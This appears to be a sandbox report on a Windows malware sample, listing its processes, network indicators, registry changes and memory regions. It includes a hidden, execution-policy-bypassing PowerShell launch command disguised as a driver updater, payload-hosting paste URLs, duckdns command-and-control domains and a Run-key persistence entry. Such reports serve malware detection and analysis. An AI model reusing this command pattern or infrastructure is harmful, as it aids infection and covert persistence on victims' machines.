Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update
Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\uxrsw.ps1' ";exit
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\wbem\WmiPrvSE.exe
|
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 16 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://paste.ee/d/qYZ64/0
|
188.114.97.3
|
|
|
|
janbours92harbu03.duckdns.org
|
|
||
|
https://paste.ee/d/oWGnC/0
|
188.114.97.3
|
|
|
|
http://sbelegi.com.br/wp-content/plugins/cognac/smsinc.txt
|
128.201.75.197
|
|
|
|
https://paste.ee/d/2A2GE/0
|
188.114.97.3
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.imvu.comr
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://paste.ee
|
unknown
|
||
|
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
http://ftp.desckvbrat.com.br
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
http://desckvbrat.com.br
|
unknown
|
||
|
http://sbelegi.com.br
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://www.google.com;
|
unknown
|
||
|
http://www.imvu.com
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://sbelegi.com.br/wp-content/plugins/cognac/H#
|
unknown
|
||
|
https://analytics.paste.ee
|
unknown
|
||
|
https://paste.ee
|
unknown
|
||
|
https://paste.ee/d/2A2GE/0P
|
unknown
|
||
|
https://aka.ms/pscore6
|
unknown
|
||
|
https://pastebin.com/raw/pQQ0n3eA
|
104.20.3.235
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
|
unknown
|
||
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
|
https://www.google.com
|
unknown
|
||
|
http://geoplugin.net/json.gp/C
|
unknown
|
||
|
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://analytics.paste.ee;
|
unknown
|
||
|
https://www.google.com/accounts/servicelogin
|
unknown
|
||
|
https://login.yahoo.com/config/login
|
unknown
|
||
|
https://paste.ee/d/oWGnC/0P
|
unknown
|
||
|
https://cdnjs.cloudflare.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://cdnjs.cloudflare.com;
|
unknown
|
||
|
http://www.nirsoft.net/
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://crl.v
|
unknown
|
||
|
https://pastebin.com
|
unknown
|
||
|
https://secure.gravatar.com
|
unknown
|
||
|
https://themes.googleusercontent.com
|
unknown
|
||
|
http://www.ebuddy.com
|
unknown
|
There are 37 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
paste.ee
|
188.114.97.3
|
|
|
|
janbours92harbu04.duckdns.org
|
172.111.213.72
|
|
|
|
desckvbrat.com.br
|
191.252.83.213
|
|
|
|
sbelegi.com.br
|
128.201.75.197
|
|
|
|
pastebin.com
|
104.20.3.235
|
|
|
|
janbours92harbu03.duckdns.org
|
unknown
|
|
|
|
ftp.desckvbrat.com.br
|
unknown
|
|
|
|
geoplugin.net
|
178.237.33.50
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
104.20.3.235
|
pastebin.com
|
United States
|
|
|
|
188.114.97.3
|
paste.ee
|
European Union
|
|
|
|
172.111.213.72
|
janbours92harbu04.duckdns.org
|
United States
|
|
|
|
191.252.83.213
|
desckvbrat.com.br
|
Brazil
|
|
|
|
128.201.75.197
|
sbelegi.com.br
|
Brazil
|
|
|
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Update Drivers NVIDEO_ppc
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-DGYVFK
|
exepath
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-DGYVFK
|
licence
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-DGYVFK
|
time
|
There are 8 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
15E8000
|
heap
|
page read and write
|
|
|
|
1C7283BF000
|
trusted library allocation
|
page read and write
|
|
|
|
286CFA70000
|
trusted library allocation
|
page read and write
|
|
|
|
1C41E49E000
|
trusted library allocation
|
page read and write
|
|
|
|
12F8000
|
heap
|
page read and write
|
|
|
|
1048000
|
heap
|
page read and write
|
|
|
|
1C41E230000
|
trusted library allocation
|
page read and write
|
|
|
|
2E8F000
|
stack
|
page read and write
|
|
|
|
24FB4B62000
|
trusted library allocation
|
page read and write
|
|
|
|
400000
|
remote allocation
|
page execute and read and write
|
|
|
|
7FF848FE0000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
|
260B0082000
|
heap
|
page read and write
|
||
|
24CE5B78000
|
heap
|
page read and write
|
||
|
24CE5B20000
|
heap
|
page read and write
|
||
|
164B47E000
|
stack
|
page read and write
|
||
|
1504E73A000
|
heap
|
page read and write
|
||
|
12FC4EE0000
|
heap
|
page execute and read and write
|
||
|
7FF848E70000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D06000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F10000
|
trusted library allocation
|
page read and write
|
||
|
1C716080000
|
heap
|
page read and write
|
||
|
7FF848F80000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E90000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FB0000
|
trusted library allocation
|
page read and write
|
||
|
260B215C000
|
trusted library allocation
|
page read and write
|
||
|
1C40C1CB000
|
heap
|
page read and write
|
||
|
24CE3E9F000
|
heap
|
page read and write
|
||
|
24FB2E16000
|
heap
|
page read and write
|
||
|
260CA060000
|
heap
|
page read and write
|
||
|
A29C13E000
|
stack
|
page read and write
|
||
|
1C717CA5000
|
heap
|
page read and write
|
||
|
24CE3EB5000
|
heap
|
page read and write
|
||
|
7FF848F50000
|
trusted library allocation
|
page execute and read and write
|
||
|
A29BFBC000
|
stack
|
page read and write
|
||
|
7FF848F70000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EE0000
|
trusted library allocation
|
page read and write
|
||
|
21030500000
|
heap
|
page read and write
|
||
|
7FF848EC0000
|
trusted library allocation
|
page read and write
|
||
|
15035C00000
|
trusted library allocation
|
page read and write
|
||
|
1C41E291000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E50000
|
trusted library allocation
|
page read and write
|
||
|
24CE5D56000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
1504E800000
|
heap
|
page read and write
|
||
|
24FB5B1A000
|
trusted library allocation
|
page read and write
|
||
|
7FF848CF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
15035F82000
|
trusted library allocation
|
page read and write
|
||
|
F96F6FE000
|
stack
|
page read and write
|
||
|
24FCD10E000
|
heap
|
page read and write
|
||
|
260B1B61000
|
trusted library allocation
|
page read and write
|
||
|
64F66FF000
|
stack
|
page read and write
|
||
|
F96F2FA000
|
stack
|
page read and write
|
||
|
12FC5F83000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F10000
|
trusted library allocation
|
page read and write
|
||
|
1C40DAD0000
|
heap
|
page readonly
|
||
|
24FB2E0E000
|
heap
|
page read and write
|
||
|
21E3BD57000
|
heap
|
page execute and read and write
|
||
|
1C718C1D000
|
trusted library allocation
|
page read and write
|
||
|
48A1FBC000
|
stack
|
page read and write
|
||
|
7FF849086000
|
trusted library allocation
|
page read and write
|
||
|
24CE5B7A000
|
heap
|
page read and write
|
||
|
24FB4824000
|
heap
|
page read and write
|
||
|
C8F000
|
stack
|
page read and write
|
||
|
90BE60E000
|
stack
|
page read and write
|
||
|
21E23C0F000
|
trusted library allocation
|
page read and write
|
||
|
164B4FE000
|
stack
|
page read and write
|
||
|
24FCD051000
|
heap
|
page read and write
|
||
|
1C40E6D7000
|
trusted library allocation
|
page read and write
|
||
|
15037D11000
|
trusted library allocation
|
page read and write
|
||
|
1C7304DE000
|
heap
|
page read and write
|
||
|
1C7185E8000
|
trusted library allocation
|
page read and write
|
||
|
286BFB29000
|
trusted library allocation
|
page read and write
|
||
|
BF21837000
|
stack
|
page read and write
|
||
|
1503437D000
|
heap
|
page read and write
|
||
|
286CF699000
|
trusted library allocation
|
page read and write
|
||
|
260B00B1000
|
heap
|
page read and write
|
||
|
1365000
|
heap
|
page read and write
|
||
|
24FB4941000
|
trusted library allocation
|
page read and write
|
||
|
18832C20000
|
heap
|
page read and write
|
||
|
1C71861D000
|
trusted library allocation
|
page read and write
|
||
|
7FF848C60000
|
trusted library allocation
|
page read and write
|
||
|
79BFB8000
|
stack
|
page read and write
|
||
|
7FF848C52000
|
trusted library allocation
|
page read and write
|
||
|
24CE3D18000
|
heap
|
page read and write
|
||
|
7FF848EF0000
|
trusted library allocation
|
page read and write
|
||
|
286BF671000
|
trusted library allocation
|
page read and write
|
||
|
1504E7F7000
|
heap
|
page read and write
|
||
|
BF2157D000
|
stack
|
page read and write
|
||
|
48A2C4E000
|
stack
|
page read and write
|
||
|
24FC49B2000
|
trusted library allocation
|
page read and write
|
||
|
7FF848C3C000
|
trusted library allocation
|
page read and write
|
||
|
B8E000
|
stack
|
page read and write
|
||
|
21E2467A000
|
trusted library allocation
|
page read and write
|
||
|
1C40DB90000
|
heap
|
page read and write
|
||
|
24CE5D5C000
|
heap
|
page read and write
|
||
|
CE7B0BB000
|
stack
|
page read and write
|
||
|
12FC54E4000
|
trusted library allocation
|
page read and write
|
||
|
24FB6769000
|
trusted library allocation
|
page read and write
|
||
|
260B200D000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DE2000
|
trusted library allocation
|
page read and write
|
||
|
7DF4F7870000
|
trusted library allocation
|
page execute and read and write
|
||
|
260C1BD2000
|
trusted library allocation
|
page read and write
|
||
|
7FF848C4D000
|
trusted library allocation
|
page execute and read and write
|
||
|
15036961000
|
trusted library allocation
|
page read and write
|
||
|
90BD47F000
|
stack
|
page read and write
|
||
|
7FF848E00000
|
trusted library allocation
|
page execute and read and write
|
||
|
12FC66D3000
|
trusted library allocation
|
page read and write
|
||
|
11A0000
|
heap
|
page read and write
|
||
|
7FF848F10000
|
trusted library allocation
|
page read and write
|
||
|
478000
|
remote allocation
|
page execute and read and write
|
||
|
15036F41000
|
trusted library allocation
|
page read and write
|
||
|
260B0010000
|
trusted library allocation
|
page read and write
|
||
|
2103050B000
|
heap
|
page read and write
|
||
|
12FC4E52000
|
trusted library allocation
|
page read and write
|
||
|
150345E4000
|
heap
|
page read and write
|
||
|
7FF848DE4000
|
trusted library allocation
|
page read and write
|
||
|
7FF848ED0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848C22000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EE0000
|
trusted library allocation
|
page read and write
|
||
|
21E24699000
|
trusted library allocation
|
page read and write
|
||
|
24CE5D7A000
|
heap
|
page read and write
|
||
|
12FC4F51000
|
trusted library allocation
|
page read and write
|
||
|
108C000
|
stack
|
page read and write
|
||
|
24FCD13E000
|
heap
|
page read and write
|
||
|
7FF848C60000
|
trusted library allocation
|
page read and write
|
||
|
1504E426000
|
heap
|
page execute and read and write
|
||
|
F96F7FC000
|
stack
|
page read and write
|
||
|
21E2480A000
|
trusted library allocation
|
page read and write
|
||
|
24FB5A01000
|
trusted library allocation
|
page read and write
|
||
|
10000000
|
direct allocation
|
page read and write
|
||
|
F96F577000
|
stack
|
page read and write
|
||
|
21E24864000
|
trusted library allocation
|
page read and write
|
||
|
12FC4D60000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F20000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F40000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EF0000
|
trusted library allocation
|
page read and write
|
||
|
DDD3FE000
|
unkown
|
page read and write
|
||
|
1C718BE0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848C50000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
|
21E24789000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E50000
|
trusted library allocation
|
page execute and read and write
|
||
|
471000
|
remote allocation
|
page execute and read and write
|
||
|
150342F7000
|
heap
|
page read and write
|
||
|
7FF848E50000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E90000
|
trusted library allocation
|
page read and write
|
||
|
24FB2DF0000
|
heap
|
page read and write
|
||
|
7FF849080000
|
trusted library allocation
|
page read and write
|
||
|
260B204D000
|
trusted library allocation
|
page read and write
|
||
|
24CE5B78000
|
heap
|
page read and write
|
||
|
2760000
|
heap
|
page read and write
|
||
|
21E24734000
|
trusted library allocation
|
page read and write
|
||
|
7FF849090000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F70000
|
trusted library allocation
|
page read and write
|
||
|
1C717BB0000
|
heap
|
page execute and read and write
|
||
|
7FF848EB0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EF0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F90000
|
trusted library allocation
|
page read and write
|
||
|
24CE5D7A000
|
heap
|
page read and write
|
||
|
12FC33F0000
|
heap
|
page read and write
|
||
|
24FB5392000
|
trusted library allocation
|
page read and write
|
||
|
286CF6EE000
|
trusted library allocation
|
page read and write
|
||
|
21E2479D000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D10000
|
trusted library allocation
|
page execute and read and write
|
||
|
21E24617000
|
trusted library allocation
|
page read and write
|
||
|
7FF84908D000
|
trusted library allocation
|
page read and write
|
||
|
150372D5000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EC0000
|
trusted library allocation
|
page read and write
|
||
|
260C9FF7000
|
heap
|
page read and write
|
||
|
24FB47B0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848CF0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E60000
|
trusted library allocation
|
page read and write
|
||
|
123E000
|
stack
|
page read and write
|
||
|
3DAE000
|
stack
|
page read and write
|
||
|
7FF848E32000
|
trusted library allocation
|
page read and write
|
||
|
7FF848C60000
|
trusted library allocation
|
page read and write
|
||
|
1C40BFF0000
|
heap
|
page read and write
|
||
|
79BC7F000
|
stack
|
page read and write
|
||
|
24CE5B66000
|
heap
|
page read and write
|
||
|
1C40C209000
|
heap
|
page read and write
|
||
|
21E248D1000
|
trusted library allocation
|
page read and write
|
||
|
12FDD559000
|
heap
|
page read and write
|
||
|
DDD2FD000
|
stack
|
page read and write
|
||
|
164B83E000
|
stack
|
page read and write
|
||
|
7FF848E40000
|
trusted library allocation
|
page read and write
|
||
|
286BFDC6000
|
trusted library allocation
|
page read and write
|
||
|
1C40E6B2000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E0A000
|
trusted library allocation
|
page read and write
|
||
|
1C718898000
|
trusted library allocation
|
page read and write
|
||
|
24CE5D26000
|
heap
|
page read and write
|
||
|
A29C0BE000
|
stack
|
page read and write
|
||
|
12FC4E20000
|
trusted library allocation
|
page read and write
|
||
|
21E248A4000
|
trusted library allocation
|
page read and write
|
||
|
1C40E73A000
|
trusted library allocation
|
page read and write
|
||
|
286BFB8E000
|
trusted library allocation
|
page read and write
|
||
|
15035CB0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848C43000
|
trusted library allocation
|
page execute and read and write
|
||
|
24CE5AF6000
|
heap
|
page read and write
|
||
|
7FF848E80000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E50000
|
trusted library allocation
|
page read and write
|
||
|
24CE5D36000
|
heap
|
page read and write
|
||
|
7FF848F00000
|
trusted library allocation
|
page read and write
|
||
|
1C40E0BC000
|
heap
|
page read and write
|
||
|
1100000
|
heap
|
page read and write
|
||
|
90BDA7E000
|
stack
|
page read and write
|
||
|
24CE57A0000
|
heap
|
page read and write
|
||
|
24FB2F74000
|
heap
|
page read and write
|
||
|
7FF848F52000
|
trusted library allocation
|
page read and write
|
||
|
24FB5A64000
|
trusted library allocation
|
page read and write
|
||
|
1504E7D6000
|
heap
|
page read and write
|
||
|
7FF848CFC000
|
trusted library allocation
|
page execute and read and write
|
||
|
24FCCD2E000
|
heap
|
page read and write
|
||
|
7FF848E90000
|
trusted library allocation
|
page read and write
|
||
|
286D7A81000
|
heap
|
page read and write
|
||
|
11F0000
|
heap
|
page read and write
|
||
|
260B00CD000
|
heap
|
page read and write
|
||
|
21E2448E000
|
trusted library allocation
|
page read and write
|
||
|
7FF848C5D000
|
trusted library allocation
|
page execute and read and write
|
||
|
24CE3BE0000
|
heap
|
page read and write
|
||
|
260CA0A8000
|
heap
|
page read and write
|
||
|
15034330000
|
heap
|
page read and write
|
||
|
12FDD538000
|
heap
|
page read and write
|
||
|
433B000
|
heap
|
page read and write
|
||
|
12FC552E000
|
trusted library allocation
|
page read and write
|
||
|
286BF8EE000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F70000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F30000
|
trusted library allocation
|
page read and write
|
||
|
7FF848C5D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848F20000
|
trusted library allocation
|
page read and write
|
||
|
1368000
|
heap
|
page read and write
|
||
|
24CE5D7A000
|
heap
|
page read and write
|
||
|
150342F0000
|
heap
|
page read and write
|
||
|
48A1F37000
|
stack
|
page read and write
|
||
|
48A1DFD000
|
stack
|
page read and write
|
||
|
21E2491B000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DD2000
|
trusted library allocation
|
page read and write
|
||
|
48A1D7E000
|
stack
|
page read and write
|
||
|
7FF848C34000
|
trusted library allocation
|
page read and write
|
||
|
474000
|
remote allocation
|
page execute and read and write
|
||
|
CE7A87E000
|
stack
|
page read and write
|
||
|
24FB2E9D000
|
heap
|
page read and write
|
||
|
48A17F5000
|
stack
|
page read and write
|
||
|
12FC4E15000
|
heap
|
page read and write
|
||
|
21E23690000
|
heap
|
page read and write
|
||
|
21E23D70000
|
trusted library allocation
|
page read and write
|
||
|
286BF4E0000
|
trusted library allocation
|
page read and write
|
||
|
A29CC4E000
|
stack
|
page read and write
|
||
|
BF216FF000
|
stack
|
page read and write
|
||
|
7FF848E70000
|
trusted library allocation
|
page read and write
|
||
|
286BD5B0000
|
heap
|
page read and write
|
||
|
7FF848ED0000
|
trusted library allocation
|
page read and write
|
||
|
24CE3D10000
|
heap
|
page read and write
|
||
|
24FCD210000
|
trusted library allocation
|
page read and write
|
||
|
12FDD4B5000
|
heap
|
page read and write
|
||
|
12FC4D70000
|
heap
|
page readonly
|
||
|
24CE3D15000
|
heap
|
page read and write
|
||
|
1C40E452000
|
trusted library allocation
|
page read and write
|
||
|
260C9FB0000
|
heap
|
page read and write
|
||
|
12FD5412000
|
trusted library allocation
|
page read and write
|
||
|
1504E250000
|
heap
|
page read and write
|
||
|
12FC550A000
|
trusted library allocation
|
page read and write
|
||
|
7FF848C53000
|
trusted library allocation
|
page execute and read and write
|
||
|
7C502FE000
|
stack
|
page read and write
|
||
|
260B1C71000
|
trusted library allocation
|
page read and write
|
||
|
24FC4C2F000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D00000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EC0000
|
trusted library allocation
|
page read and write
|
||
|
12FD5266000
|
trusted library allocation
|
page read and write
|
||
|
10F4000
|
stack
|
page read and write
|
||
|
90BD7FD000
|
stack
|
page read and write
|
||
|
24CE5D40000
|
heap
|
page read and write
|
||
|
7FF848E11000
|
trusted library allocation
|
page read and write
|
||
|
21E24093000
|
trusted library allocation
|
page read and write
|
||
|
21E2485B000
|
trusted library allocation
|
page read and write
|
||
|
1504E680000
|
heap
|
page read and write
|
||
|
471000
|
remote allocation
|
page execute and read and write
|
||
|
3912000
|
heap
|
page read and write
|
||
|
A29CCCD000
|
stack
|
page read and write
|
||
|
1C7281DE000
|
trusted library allocation
|
page read and write
|
||
|
BF215FE000
|
stack
|
page read and write
|
||
|
7FF849070000
|
trusted library allocation
|
page execute and read and write
|
||
|
A29C23B000
|
stack
|
page read and write
|
||
|
D5E000
|
heap
|
page read and write
|
||
|
12FDD490000
|
heap
|
page execute and read and write
|
||
|
1504E420000
|
heap
|
page execute and read and write
|
||
|
1504E2A0000
|
heap
|
page read and write
|
||
|
12FC4E10000
|
heap
|
page read and write
|
||
|
18832C25000
|
heap
|
page read and write
|
||
|
21E3BE4D000
|
heap
|
page read and write
|
||
|
24CE5BAA000
|
heap
|
page read and write
|
||
|
11F5000
|
heap
|
page read and write
|
||
|
21E21CC0000
|
heap
|
page read and write
|
||
|
21E21C80000
|
heap
|
page read and write
|
||
|
24FCCDBE000
|
heap
|
page read and write
|
||
|
1C7302C0000
|
heap
|
page execute and read and write
|
||
|
90BDAFE000
|
stack
|
page read and write
|
||
|
7FF848C70000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DF1000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D00000
|
trusted library allocation
|
page read and write
|
||
|
2F4D000
|
stack
|
page read and write
|
||
|
7FF848E01000
|
trusted library allocation
|
page read and write
|
||
|
15035C70000
|
trusted library allocation
|
page read and write
|
||
|
7FF848ED0000
|
trusted library allocation
|
page read and write
|
||
|
24FB2F10000
|
heap
|
page read and write
|
||
|
1C718816000
|
trusted library allocation
|
page read and write
|
||
|
1C40E4A0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E70000
|
trusted library allocation
|
page read and write
|
||
|
1503434E000
|
heap
|
page read and write
|
||
|
12FC5341000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F60000
|
trusted library allocation
|
page read and write
|
||
|
21E248C3000
|
trusted library allocation
|
page read and write
|
||
|
1504E7B3000
|
heap
|
page read and write
|
||
|
1C40E6DB000
|
trusted library allocation
|
page read and write
|
||
|
F97034C000
|
stack
|
page read and write
|
||
|
7FF848E32000
|
trusted library allocation
|
page read and write
|
||
|
10F2000
|
stack
|
page read and write
|
||
|
7FF848F40000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D1C000
|
trusted library allocation
|
page execute and read and write
|
||
|
164C68D000
|
stack
|
page read and write
|
||
|
2D20000
|
heap
|
page read and write
|
||
|
286BFB96000
|
trusted library allocation
|
page read and write
|
||
|
260B1B83000
|
trusted library allocation
|
page read and write
|
||
|
1C717BF0000
|
trusted library allocation
|
page read and write
|
||
|
12FC34C0000
|
heap
|
page read and write
|
||
|
286BF580000
|
heap
|
page execute and read and write
|
||
|
24FB2E74000
|
heap
|
page read and write
|
||
|
10FB000
|
stack
|
page read and write
|
||
|
286BD6EA000
|
heap
|
page read and write
|
||
|
1C7161CE000
|
heap
|
page read and write
|
||
|
286BF660000
|
heap
|
page read and write
|
||
|
7FF848E0A000
|
trusted library allocation
|
page read and write
|
||
|
21E21E10000
|
heap
|
page read and write
|
||
|
21E3BE59000
|
heap
|
page read and write
|
||
|
286D7A60000
|
heap
|
page read and write
|
||
|
164BABE000
|
stack
|
page read and write
|
||
|
286BFF74000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E25000
|
trusted library allocation
|
page read and write
|
||
|
24FB4770000
|
trusted library allocation
|
page read and write
|
||
|
325F000
|
stack
|
page read and write
|
||
|
12FDD430000
|
trusted library section
|
page read and write
|
||
|
BF2147E000
|
stack
|
page read and write
|
||
|
1C7185D0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E50000
|
trusted library allocation
|
page read and write
|
||
|
12FDD4A8000
|
heap
|
page read and write
|
||
|
7FF848F00000
|
trusted library allocation
|
page read and write
|
||
|
164B8B7000
|
stack
|
page read and write
|
||
|
15035F00000
|
heap
|
page read and write
|
||
|
1C718C21000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E22000
|
trusted library allocation
|
page read and write
|
||
|
7FF848CEC000
|
trusted library allocation
|
page execute and read and write
|
||
|
12FC534E000
|
trusted library allocation
|
page read and write
|
||
|
21E3BD72000
|
heap
|
page read and write
|
||
|
7FF848DD0000
|
trusted library allocation
|
page read and write
|
||
|
12FDD56D000
|
heap
|
page read and write
|
||
|
15036132000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FB0000
|
trusted library allocation
|
page read and write
|
||
|
150345A0000
|
heap
|
page read and write
|
||
|
7FF848FB0000
|
trusted library allocation
|
page read and write
|
||
|
286BD990000
|
heap
|
page read and write
|
||
|
24FCD00F000
|
heap
|
page read and write
|
||
|
12FDD73F000
|
heap
|
page read and write
|
||
|
7FF848F09000
|
trusted library allocation
|
page read and write
|
||
|
286BFB81000
|
trusted library allocation
|
page read and write
|
||
|
164BBBF000
|
stack
|
page read and write
|
||
|
BF21BBB000
|
stack
|
page read and write
|
||
|
21E246DC000
|
trusted library allocation
|
page read and write
|
||
|
15035C30000
|
heap
|
page readonly
|
||
|
21E247BB000
|
trusted library allocation
|
page read and write
|
||
|
48A21BF000
|
stack
|
page read and write
|
||
|
1C41E43E000
|
trusted library allocation
|
page read and write
|
||
|
12FC35B6000
|
heap
|
page read and write
|
||
|
24CE6018000
|
heap
|
page read and write
|
||
|
7FF848F70000
|
trusted library allocation
|
page read and write
|
||
|
286BD5C0000
|
heap
|
page read and write
|
||
|
24FB2E4D000
|
heap
|
page read and write
|
||
|
7FF848E80000
|
trusted library allocation
|
page read and write
|
||
|
7FF848CD0000
|
trusted library allocation
|
page read and write
|
||
|
21E3BD8C000
|
heap
|
page read and write
|
||
|
21E33BE1000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E20000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF84904C000
|
trusted library allocation
|
page read and write
|
||
|
DEC000
|
stack
|
page read and write
|
||
|
286D7957000
|
heap
|
page execute and read and write
|
||
|
286CF8EF000
|
trusted library allocation
|
page read and write
|
||
|
CE7A9FE000
|
stack
|
page read and write
|
||
|
7FF848E00000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848F73000
|
trusted library allocation
|
page read and write
|
||
|
164B93B000
|
stack
|
page read and write
|
||
|
1C7281B2000
|
trusted library allocation
|
page read and write
|
||
|
1C42637A000
|
heap
|
page read and write
|
||
|
21E3BD88000
|
heap
|
page read and write
|
||
|
7FF848C30000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
21E245EB000
|
trusted library allocation
|
page read and write
|
||
|
24FB5D04000
|
trusted library allocation
|
page read and write
|
||
|
1C40C1AB000
|
heap
|
page read and write
|
||
|
24CE5B78000
|
heap
|
page read and write
|
||
|
1C40C120000
|
heap
|
page read and write
|
||
|
7FF848EE0000
|
trusted library allocation
|
page read and write
|
||
|
CE7AAFF000
|
stack
|
